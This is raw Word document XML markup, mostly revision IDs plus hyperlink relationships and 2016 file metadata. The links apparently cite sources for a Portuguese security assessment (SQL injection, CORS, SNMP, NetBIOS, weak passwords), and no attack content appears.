    <w:rsid w:val="00087FBC"/>
    <w:rsid w:val="00093CAB"/>
    <w:rsid w:val="000A57C9"/>
    <w:rsid w:val="000A6729"/>
    <w:rsid w:val="000C051E"/>
    <w:rsid w:val="000C4BC3"/>
    <w:rsid w:val="000C72B3"/>
    <w:rsid w:val="000D038A"/>
    <w:rsid w:val="000D3326"/>
    <w:rsid w:val="000D4E90"/>
    <w:rsid w:val="000D5C45"/>
    <w:rsid w:val="000E26E7"/>
    <w:rsid w:val="000E2EE2"/>
    <w:rsid w:val="000E35CD"/>
    <w:rsid w:val="000E6FA1"/>
    <w:rsid w:val="000F06E4"/>
    <w:rsid w:val="000F4CD1"/>
    <w:rsid w:val="00101063"/>
    <w:rsid w:val="001031B5"/>
    <w:rsid w:val="001124EF"/>
    <w:rsid w:val="001151C8"/>
    <w:rsid w:val="001247A7"/>
    <w:rsid w:val="00136AE5"/>
    <w:rsid w:val="001557DC"/>
    <w:rsid w:val="001609AB"/>
    <w:rsid w:val="00166FEA"/>
    <w:rsid w:val="001702C9"/>
    <w:rsid w:val="00171C6D"/>
    <w:rsid w:val="00174603"/>
    <w:rsid w:val="00174B27"/>
    <w:rsid w:val="00184BA7"/>
    <w:rsid w:val="00185392"/>
    <w:rsid w:val="00185A92"/>
    <w:rsid w:val="00185ED4"/>
    <w:rsid w:val="00190AAD"/>
    <w:rsid w:val="00191402"/>
    <w:rsid w:val="001923D7"/>
    <w:rsid w:val="0019637C"/>
    <w:rsid w:val="001968AD"/>
    <w:rsid w:val="00196FF2"/>
    <w:rsid w:val="00197C78"/>
    <w:rsid w:val="001A1CBE"/>
    <w:rsid w:val="001A5B8E"/>
    <w:rsid w:val="001A5DFB"/>
    <w:rsid w:val="001B2A0B"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="001C4F4D"/>
    <w:rsid w:val="001C7028"/>
    <w:rsid w:val="001D6374"/>
    <w:rsid w:val="001E28D1"/>
    <w:rsid w:val="001E29F7"/>
    <w:rsid w:val="001E6279"/>
    <w:rsid w:val="001F4C0E"/>
    <w:rsid w:val="001F5050"/>
    <w:rsid w:val="001F6642"/>
    <w:rsid w:val="00201E30"/>
    <w:rsid w:val="00201EA5"/>
    <w:rsid w:val="0020416E"/>
    <w:rsid w:val="00204E77"/>
    <w:rsid w:val="00211EF9"/>
    <w:rsid w:val="002151B5"/>
    <w:rsid w:val="00224FD8"/>
    <w:rsid w:val="00236FDF"/>
    <w:rsid w:val="00240857"/>
    <w:rsid w:val="0024287E"/>
    <w:rsid w:val="0024453B"/>
    <w:rsid w:val="002643BE"/>
    <w:rsid w:val="00265100"/>
    <w:rsid w:val="00265310"/>
    <w:rsid w:val="00271556"/>
    <w:rsid w:val="002719E7"/>
    <w:rsid w:val="0027244F"/>
    <w:rsid w:val="00284BB3"/>
    <w:rsid w:val="00294FE0"/>
    <w:rsid w:val="0029632F"/>
    <w:rsid w:val="00296685"/>
    <w:rsid w:val="002A0DD8"/>
    <w:rsid w:val="002A5945"/>
    <w:rsid w:val="002A5CE5"/>
    <w:rsid w:val="002B1EF3"/>
    <w:rsid w:val="002C07B9"/>
    <w:rsid w:val="002C0836"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C52C4"/>
    <w:rsid w:val="002D16A4"/>
    <w:rsid w:val="002D20FB"/>
    <w:rsid w:val="002D3D74"/>
    <w:rsid w:val="002D4365"/>
    <w:rsid w:val="002E34E0"/>
    <w:rsid w:val="00310663"/>
    <w:rsid w:val="00310E6C"/>
    <w:rsid w:val="00311F69"/>
    <w:rsid w:val="00313924"/>
    <w:rsid w:val="003164B7"/>
    <w:rsid w:val="003178EE"/>
    <w:rsid w:val="00322A98"/>
    <w:rsid w:val="00323A19"/>
    <w:rsid w:val="003243CE"/>
    <w:rsid w:val="003249F0"/>
    <w:rsid w:val="00335763"/>
    <w:rsid w:val="00337476"/>
    <w:rsid w:val="00352313"/>
    <w:rsid w:val="00361C8E"/>
    <w:rsid w:val="0036432A"/>
    <w:rsid w:val="003745C8"/>
    <w:rsid w:val="00384949"/>
    <w:rsid w:val="00384E80"/>
    <w:rsid w:val="003A39F6"/>
    <w:rsid w:val="003A3B54"/>
    <w:rsid w:val="003A5422"/>
    <w:rsid w:val="003B06CC"/>
    <w:rsid w:val="003B3BB8"/>
    <w:rsid w:val="003D0913"/>
    <w:rsid w:val="003D141C"/>
    <w:rsid w:val="003D23F9"/>
    <w:rsid w:val="003D4E1D"/>
    <w:rsid w:val="003E1ACB"/>
    <w:rsid w:val="003E38DF"/>
    <w:rsid w:val="003E4BBF"/>
    <w:rsid w:val="003E7654"/>
    <w:rsid w:val="003F0DBB"/>
    <w:rsid w:val="003F1C5E"/>
    <w:rsid w:val="003F3756"/>
    <w:rsid w:val="003F40A0"/>
    <w:rsid w:val="003F4807"/>
    <w:rsid w:val="003F56AB"/>
    <w:rsid w:val="003F64B7"/>
    <w:rsid w:val="0040058D"/>
    <w:rsid w:val="004035BE"/>
    <w:rsid w:val="0040482C"/>
    <w:rsid w:val="00412443"/>
    <w:rsid w:val="00415B47"/>
    <w:rsid w:val="00417333"/>
    <w:rsid w:val="00417AE8"/>
    <w:rsid w:val="00430E45"/>
    <w:rsid w:val="00432597"/>
    <w:rsid w:val="00441C24"/>
    <w:rsid w:val="00455AB7"/>
    <w:rsid w:val="00456110"/>
    <w:rsid w:val="0045732E"/>
    <w:rsid w:val="004741DB"/>
    <w:rsid w:val="00477883"/>
    <w:rsid w:val="0048383A"/>
    <w:rsid w:val="0048472B"/>
    <w:rsid w:val="004850DA"/>
    <w:rsid w:val="0049098B"/>
    <w:rsid w:val="0049317F"/>
    <w:rsid w:val="004B1DCC"/>
    <w:rsid w:val="004B2991"/>
    <w:rsid w:val="004B38C9"/>
    <w:rsid w:val="004B4607"/>
    <w:rsid w:val="004C1B81"/>
    <w:rsid w:val="004C783E"/>
    <w:rsid w:val="004D25DD"/>
    <w:rsid w:val="004E0A86"/>
    <w:rsid w:val="004E12C9"/>
    <w:rsid w:val="004E1803"/>
    <w:rsid w:val="004E2307"/>
    <w:rsid w:val="004F298F"/>
    <w:rsid w:val="004F3071"/>
    <w:rsid w:val="004F40AA"/>
    <w:rsid w:val="00503644"/>
    <w:rsid w:val="00510DD2"/>
    <w:rsid w:val="005135D8"/>
    <w:rsid w:val="00517685"/>
    <w:rsid w:val="005269EB"/>
    <w:rsid w:val="00527C9A"/>
    <w:rsid w:val="00530877"/>
    <w:rsid w:val="005352FA"/>
    <w:rsid w:val="00537F7B"/>
    <w:rsid w:val="00544368"/>
    <w:rsid w:val="00546C53"/>
    <w:rsid w:val="00546F66"/>
    <w:rsid w:val="00557D26"/>
    <w:rsid w:val="00564674"/>
    <w:rsid w:val="00564D7D"/>
    <w:rsid w:val="005678E5"/>
    <w:rsid w:val="00567ED2"/>
    <w:rsid w:val="00572346"/>
    <w:rsid w:val="00572A0D"/>
    <w:rsid w:val="0058247A"/>
    <w:rsid w:val="0058462E"/>
    <w:rsid w:val="00594AD8"/>
    <w:rsid w:val="005967D5"/>
    <w:rsid w:val="005A089C"/>
    <w:rsid w:val="005A5292"/>
    <w:rsid w:val="005A68AB"/>
    <w:rsid w:val="005B3078"/>
    <w:rsid w:val="005B5243"/>
    <w:rsid w:val="005C42F0"/>
    <w:rsid w:val="005C7184"/>
    <w:rsid w:val="005C728E"/>
    <w:rsid w:val="005D3B2A"/>
    <w:rsid w:val="005D6685"/>
    <w:rsid w:val="005D6A2A"/>
    <w:rsid w:val="005E239F"/>
    <w:rsid w:val="005E45A3"/>
    <w:rsid w:val="005F4015"/>
    <w:rsid w:val="005F470B"/>
    <w:rsid w:val="005F6E06"/>
    <w:rsid w:val="005F79D1"/>
    <w:rsid w:val="006035EF"/>
    <w:rsid w:val="00603B2C"/>
    <w:rsid w:val="00605CFE"/>
    <w:rsid w:val="006071F5"/>
    <w:rsid w:val="00623C1F"/>
    <w:rsid w:val="0062442F"/>
    <w:rsid w:val="00626AC7"/>
    <w:rsid w:val="00630433"/>
    <w:rsid w:val="0063700A"/>
    <w:rsid w:val="00640C50"/>
    <w:rsid w:val="00641283"/>
    <w:rsid w:val="006473CA"/>
    <w:rsid w:val="00650630"/>
    <w:rsid w:val="006515FB"/>
    <w:rsid w:val="00654CAB"/>
    <w:rsid w:val="00654DEF"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="006635A8"/>
    <w:rsid w:val="00670E3E"/>
    <w:rsid w:val="00676E62"/>
    <w:rsid w:val="0068102E"/>
    <w:rsid w:val="006853AA"/>
    <w:rsid w:val="00685A02"/>
    <w:rsid w:val="006876BB"/>
    <w:rsid w:val="006A38D8"/>
    <w:rsid w:val="006A578B"/>
    <w:rsid w:val="006B700D"/>
    <w:rsid w:val="006C08DA"/>
    <w:rsid w:val="006C21E3"/>
    <w:rsid w:val="006C2DFF"/>
    <w:rsid w:val="006C31FD"/>
    <w:rsid w:val="006D580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11484"/>
    <w:rsid w:val="00713FBD"/>
    <w:rsid w:val="007260B8"/>
    <w:rsid w:val="00736DBC"/>
    <w:rsid w:val="00737A20"/>
    <w:rsid w:val="0074275B"/>
    <w:rsid w:val="00745B49"/>
    <w:rsid w:val="00751591"/>
    <w:rsid w:val="00760D9A"/>
    <w:rsid w:val="00762DFF"/>
    <w:rsid w:val="00763063"/>
    <w:rsid w:val="0076417A"/>
    <w:rsid w:val="007649FC"/>
    <w:rsid w:val="00765ACB"/>
    <w:rsid w:val="00771369"/>
    <w:rsid w:val="00777DDF"/>
    <w:rsid w:val="007804EC"/>
    <w:rsid w:val="00790D68"/>
    <w:rsid w:val="00790EC9"/>
    <w:rsid w:val="00791E90"/>
    <w:rsid w:val="007952E2"/>
    <w:rsid w:val="007A267D"/>
    <w:rsid w:val="007B299D"/>
    <w:rsid w:val="007D094F"/>
    <w:rsid w:val="007D3513"/>
    <w:rsid w:val="007E0AF9"/>
    <w:rsid w:val="007E2011"/>
    <w:rsid w:val="007E46A7"/>
    <w:rsid w:val="007F53C1"/>
    <w:rsid w:val="007F5D29"/>
    <w:rsid w:val="00801C36"/>
    <w:rsid w:val="00807BFC"/>
    <w:rsid w:val="00807E49"/>
    <w:rsid w:val="008176F3"/>
    <w:rsid w:val="00817857"/>
    <w:rsid w:val="00824DA2"/>
    <w:rsid w:val="00825FE5"/>
    <w:rsid w:val="00827015"/>
    <w:rsid w:val="00830AAF"/>
    <w:rsid w:val="00830E80"/>
    <w:rsid w:val="00831A3E"/>
    <w:rsid w:val="00834FAA"/>
    <w:rsid w:val="00837F79"/>
    <w:rsid w:val="00846A20"/>
    <w:rsid w:val="0084777A"/>
    <w:rsid w:val="0085362D"/>
    <w:rsid w:val="00857C40"/>
    <w:rsid w:val="00861DFE"/>
    <w:rsid w:val="00863ADF"/>
    <w:rsid w:val="00870818"/>
    <w:rsid w:val="008719F1"/>
    <w:rsid w:val="00874975"/>
    <w:rsid w:val="00881DA5"/>
    <w:rsid w:val="00885145"/>
    <w:rsid w:val="0088539E"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="00892814"/>
    <w:rsid w:val="00892BCB"/>
    <w:rsid w:val="008A7473"/>
    <w:rsid w:val="008A79EE"/>
    <w:rsid w:val="008A7BB2"/>
    <w:rsid w:val="008B447D"/>
    <w:rsid w:val="008C2F72"/>
    <w:rsid w:val="008C6DC7"/>
    <w:rsid w:val="008D02E1"/>
    <w:rsid w:val="008D0530"/>
    <w:rsid w:val="00902307"/>
    <w:rsid w:val="00906B58"/>
    <w:rsid w:val="00915C31"/>
    <w:rsid w:val="00925B9A"/>
    <w:rsid w:val="00930BEA"/>
    <w:rsid w:val="00934569"/>
    <w:rsid w:val="00935C82"/>
    <w:rsid w:val="0094228B"/>
    <w:rsid w:val="00944F31"/>
    <w:rsid w:val="00945AD3"/>
    <w:rsid w:val="0096190A"/>
    <w:rsid w:val="00967B9F"/>
    <w:rsid w:val="00985A8F"/>
    <w:rsid w:val="00986FE1"/>
    <w:rsid w:val="009A2041"/>
    <w:rsid w:val="009A30BC"/>
    <w:rsid w:val="009A5A72"/>
    <w:rsid w:val="009A6B56"/>
    <w:rsid w:val="009A7448"/>
    <w:rsid w:val="009B1DC9"/>
    <w:rsid w:val="009B63C8"/>
    <w:rsid w:val="009B7BA9"/>
    <w:rsid w:val="009C102E"/>
    <w:rsid w:val="009C3F25"/>
    <w:rsid w:val="009C4FBC"/>
    <w:rsid w:val="009C5396"/>
    <w:rsid w:val="009C5A26"/>
    <w:rsid w:val="009C7901"/>
    <w:rsid w:val="009D0F86"/>
    <w:rsid w:val="009E0E00"/>
    <w:rsid w:val="009E4891"/>
    <w:rsid w:val="009F24CC"/>
    <w:rsid w:val="009F30B5"/>
    <w:rsid w:val="009F42DE"/>
    <w:rsid w:val="009F5169"/>
    <w:rsid w:val="009F7A3C"/>
    <w:rsid w:val="00A03082"/>
    <w:rsid w:val="00A124EE"/>
    <w:rsid w:val="00A13973"/>
    <w:rsid w:val="00A206ED"/>
    <w:rsid w:val="00A218DE"/>
    <w:rsid w:val="00A24E0E"/>
    <w:rsid w:val="00A30A25"/>
    <w:rsid w:val="00A338A6"/>
    <w:rsid w:val="00A40129"/>
    <w:rsid w:val="00A5289A"/>
    <w:rsid w:val="00A63EAA"/>
    <w:rsid w:val="00A66072"/>
    <w:rsid w:val="00A80565"/>
    <w:rsid w:val="00A83EB9"/>
    <w:rsid w:val="00A93306"/>
    <w:rsid w:val="00A93C57"/>
    <w:rsid w:val="00A9523B"/>
    <w:rsid w:val="00A966EC"/>
    <w:rsid w:val="00AA00BE"/>
    <w:rsid w:val="00AB1C01"/>
    <w:rsid w:val="00AB57A1"/>
    <w:rsid w:val="00AB5BB3"/>
    <w:rsid w:val="00AB70E4"/>
    <w:rsid w:val="00AC10DC"/>
    <w:rsid w:val="00AF04A2"/>
    <w:rsid w:val="00AF248B"/>
    <w:rsid w:val="00AF4680"/>
    <w:rsid w:val="00B004A6"/>
    <w:rsid w:val="00B005A4"/>
    <w:rsid w:val="00B01036"/>
    <w:rsid w:val="00B04AF1"/>
    <w:rsid w:val="00B05006"/>
    <w:rsid w:val="00B135C4"/>
    <w:rsid w:val="00B15531"/>
    <w:rsid w:val="00B17B93"/>
    <w:rsid w:val="00B25D43"/>
    <w:rsid w:val="00B3361B"/>
    <w:rsid w:val="00B3425E"/>
    <w:rsid w:val="00B42017"/>
    <w:rsid w:val="00B51059"/>
    <w:rsid w:val="00B560B0"/>
    <w:rsid w:val="00B654D1"/>
    <w:rsid w:val="00B71318"/>
    <w:rsid w:val="00B7146E"/>
    <w:rsid w:val="00B71A0F"/>
    <w:rsid w:val="00B770F6"/>
    <w:rsid w:val="00B77FD2"/>
    <w:rsid w:val="00B800D4"/>
    <w:rsid w:val="00B846D4"/>
    <w:rsid w:val="00B854D0"/>
    <w:rsid w:val="00B959F5"/>
    <w:rsid w:val="00BA5C02"/>
    <w:rsid w:val="00BA7CEE"/>
    <w:rsid w:val="00BB751B"/>
    <w:rsid w:val="00BC05C8"/>
    <w:rsid w:val="00BC1742"/>
    <w:rsid w:val="00BC1926"/>
    <w:rsid w:val="00BC404F"/>
    <w:rsid w:val="00BC5B4A"/>
    <w:rsid w:val="00BC5DD9"/>
    <w:rsid w:val="00BD2955"/>
    <w:rsid w:val="00BD33F6"/>
    <w:rsid w:val="00BD4B94"/>
    <w:rsid w:val="00BE0837"/>
    <w:rsid w:val="00BE4C3F"/>
    <w:rsid w:val="00BE58C0"/>
    <w:rsid w:val="00BF1C7D"/>
    <w:rsid w:val="00BF5785"/>
    <w:rsid w:val="00BF6E55"/>
    <w:rsid w:val="00C0198A"/>
    <w:rsid w:val="00C07952"/>
    <w:rsid w:val="00C07971"/>
    <w:rsid w:val="00C12C3D"/>
    <w:rsid w:val="00C306C8"/>
    <w:rsid w:val="00C32280"/>
    <w:rsid w:val="00C343E2"/>
    <w:rsid w:val="00C366F7"/>
    <w:rsid w:val="00C36925"/>
    <w:rsid w:val="00C3730D"/>
    <w:rsid w:val="00C37DA7"/>
    <w:rsid w:val="00C52360"/>
    <w:rsid w:val="00C52795"/>
    <w:rsid w:val="00C624EB"/>
    <w:rsid w:val="00C654ED"/>
    <w:rsid w:val="00C815A6"/>
    <w:rsid w:val="00C8356E"/>
    <w:rsid w:val="00C86D69"/>
    <w:rsid w:val="00C97F3F"/>
    <w:rsid w:val="00CA5E41"/>
    <w:rsid w:val="00CB425C"/>
    <w:rsid w:val="00CC2CE7"/>
    <w:rsid w:val="00CC3790"/>
    <w:rsid w:val="00CC524A"/>
    <w:rsid w:val="00CD0164"/>
    <w:rsid w:val="00CD779F"/>
    <w:rsid w:val="00CE03DD"/>
    <w:rsid w:val="00CE2FCC"/>
    <w:rsid w:val="00CE3185"/>
    <w:rsid w:val="00CE5109"/>
    <w:rsid w:val="00CE679F"/>
    <w:rsid w:val="00D02F49"/>
    <w:rsid w:val="00D04B46"/>
    <w:rsid w:val="00D136D4"/>
    <w:rsid w:val="00D20770"/>
    <w:rsid w:val="00D24FC5"/>
    <w:rsid w:val="00D27AD8"/>
    <w:rsid w:val="00D32318"/>
    <w:rsid w:val="00D349CE"/>
    <w:rsid w:val="00D41B54"/>
    <w:rsid w:val="00D4218C"/>
    <w:rsid w:val="00D43F1D"/>
    <w:rsid w:val="00D44803"/>
    <w:rsid w:val="00D45386"/>
    <w:rsid w:val="00D46C6B"/>
    <w:rsid w:val="00D50B6F"/>
    <w:rsid w:val="00D56FE7"/>
    <w:rsid w:val="00D57137"/>
    <w:rsid w:val="00D602EF"/>
    <w:rsid w:val="00D60336"/>
    <w:rsid w:val="00D62225"/>
    <w:rsid w:val="00D65D65"/>
    <w:rsid w:val="00D76012"/>
    <w:rsid w:val="00D77DFF"/>
    <w:rsid w:val="00D918FF"/>
    <w:rsid w:val="00D967F2"/>
    <w:rsid w:val="00D975CE"/>
    <w:rsid w:val="00DB70B5"/>
    <w:rsid w:val="00DD2E6C"/>
    <w:rsid w:val="00DD39B4"/>
    <w:rsid w:val="00DD5893"/>
    <w:rsid w:val="00DE2F1B"/>
    <w:rsid w:val="00DF0646"/>
    <w:rsid w:val="00DF35C8"/>
    <w:rsid w:val="00E01CAE"/>
    <w:rsid w:val="00E04E3E"/>
    <w:rsid w:val="00E068E6"/>
    <w:rsid w:val="00E14BE4"/>
    <w:rsid w:val="00E15301"/>
    <w:rsid w:val="00E158B8"/>
    <w:rsid w:val="00E16F18"/>
    <w:rsid w:val="00E27C4B"/>
    <w:rsid w:val="00E31790"/>
    <w:rsid w:val="00E400F9"/>
    <w:rsid w:val="00E4538D"/>
    <w:rsid w:val="00E453D6"/>
    <w:rsid w:val="00E513AC"/>
    <w:rsid w:val="00E52417"/>
    <w:rsid w:val="00E52521"/>
    <w:rsid w:val="00E650F5"/>
    <w:rsid w:val="00E77F75"/>
    <w:rsid w:val="00E92559"/>
    <w:rsid w:val="00E92ED1"/>
    <w:rsid w:val="00E9423C"/>
    <w:rsid w:val="00E95ED3"/>
    <w:rsid w:val="00EB09F2"/>
    <w:rsid w:val="00EB5A0B"/>
    <w:rsid w:val="00EC0987"/>
    <w:rsid w:val="00EC1DCA"/>
    <w:rsid w:val="00EC2366"/>
    <w:rsid w:val="00EC5D2B"/>
    <w:rsid w:val="00ED180C"/>
    <w:rsid w:val="00ED7438"/>
    <w:rsid w:val="00EE2B51"/>
    <w:rsid w:val="00EF59CB"/>
    <w:rsid w:val="00F018F3"/>
    <w:rsid w:val="00F02825"/>
    <w:rsid w:val="00F04EFF"/>
    <w:rsid w:val="00F05851"/>
    <w:rsid w:val="00F06499"/>
    <w:rsid w:val="00F134D7"/>
    <w:rsid w:val="00F149B2"/>
    <w:rsid w:val="00F15B60"/>
    <w:rsid w:val="00F15F82"/>
    <w:rsid w:val="00F248C0"/>
    <w:rsid w:val="00F24A83"/>
    <w:rsid w:val="00F24DE3"/>
    <w:rsid w:val="00F31372"/>
    <w:rsid w:val="00F31428"/>
    <w:rsid w:val="00F3154F"/>
    <w:rsid w:val="00F338E7"/>
    <w:rsid w:val="00F35A51"/>
    <w:rsid w:val="00F52870"/>
    <w:rsid w:val="00F5692A"/>
    <w:rsid w:val="00F6048E"/>
    <w:rsid w:val="00F71E4B"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00F87AAF"/>
    <w:rsid w:val="00F935DA"/>
    <w:rsid w:val="00FA1088"/>
    <w:rsid w:val="00FB2992"/>
    <w:rsid w:val="00FB3CB1"/>
    <w:rsid w:val="00FC374A"/>
    <w:rsid w:val="00FC41D3"/>
    <w:rsid w:val="00FD2A48"/>
    <w:rsid w:val="00FD3807"/>
    <w:rsid w:val="00FD661B"/>
    <w:rsid w:val="00FD7057"/>
    <w:rsid w:val="00FE4996"/>
    <w:rsid w:val="00FE6FEB"/>
    <w:rsid w:val="00FF1403"/>
    <w:rsid w:val="00FF1C9C"/>
    <w:rsid w:val="00FF400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8C1D10-C4F4-4146-B537-533E1585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hyperlink" Target="http://192.168.0.58/vacina/login.php?logado=false" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackertarget.com/sqlmap-post-request-injection/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://software.dzhuvinov.com/cors-filter.html" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/ms188621(v=sql.105)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hyperlink" Target="https://pt.wikipedia.org/wiki/Simple_Network_Management_Proto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hyperlink" Target="https://www.teamsid.com/worst-passwords-2015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hyperlink" Target="https://pt.wikipedia.org/wiki/NetBIO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hyperlink" Target="http://dev.mysql.com/doc/refman/5.7/en/comments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pt.wikipedia.org/wiki/Network_Time_Protocol" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/cc736675(v=ws.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s://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3.org/TR/cor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ocs.oracle.com/cd/B28359_01/appdev.111/b28370/comment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9281-C34B-4BCA-8963-944EBA9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5</Pages>
  <Words>9422</Words>
  <Characters>50882</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>424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46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-17T18:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-20T00:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>